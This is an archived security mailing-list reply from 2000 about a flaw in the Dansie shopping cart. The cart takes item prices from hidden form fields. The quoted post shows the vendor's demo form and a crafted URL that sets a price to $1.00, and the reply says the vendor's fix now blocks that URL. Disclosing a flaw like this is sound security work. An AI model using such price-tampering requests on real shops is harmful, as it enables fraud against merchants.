OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Re: more problems with that POS dansie cart software!
From: Pete Holsberg (pjhMCCC.EDU)
Date: Sun Apr 16 2000 - 17:45:58 CDT

On Fri, 14 Apr 2000, tombow wrote:

> if installing a backdoor in the cart software wasn't bad enough.. the
> whole implimentation of pricing and adding items to cart is crap..
>
> example form to add items to your cart (kindly provided on the publishers
> site using the demo cart they set up for us):
>
> *snip*
>
> <FORM METHOD=POST ACTION="http://www.dansie.net/cgi-bin/scripts/cart.pl">
>
> Black Leather purse with leather straps<BR>
> Price: $20.00<BR>
>
> <INPUT TYPE=HIDDEN NAME=name VALUE="Black leather purse">
> <INPUT TYPE=HIDDEN NAME=price VALUE="20.00">
> <INPUT TYPE=HIDDEN NAME=sh VALUE="1"> <!-- Shipping and Handling
> -->
> <INPUT TYPE=HIDDEN NAME=img VALUE="purse.jpg">
> <INPUT TYPE=HIDDEN NAME=return VALUE="http://www.dansie.net/demo.html">
> <INPUT TYPE=HIDDEN NAME=custom1 VALUE="Black leather purse with leather straps">
>
> <INPUT TYPE=SUBMIT NAME="add" VALUE="Put in Shopping Cart">
> </FORM>
>
> *snip*
>
>
> a couple of quick alterations and we can now add:
>
> one piece of crap cart software..
>
> http://www.dansie.net/cgi-bin/scripts/cart.pl?name=piece+of+crap+cart+software&price=1.00&sh=1&img=purse.jpg&return=http://www.dansie.net/demo.html&custom1=my+shopping+cart+software+sucks+because+i+let+users+manipulate+crucial+variables
>

This occurs because the person who configured the script
failed to set "persoanl variable #66". Dansie has since
done that at www.dansie.net so that the above URL now fails
to change the shopping cart variables.

Pete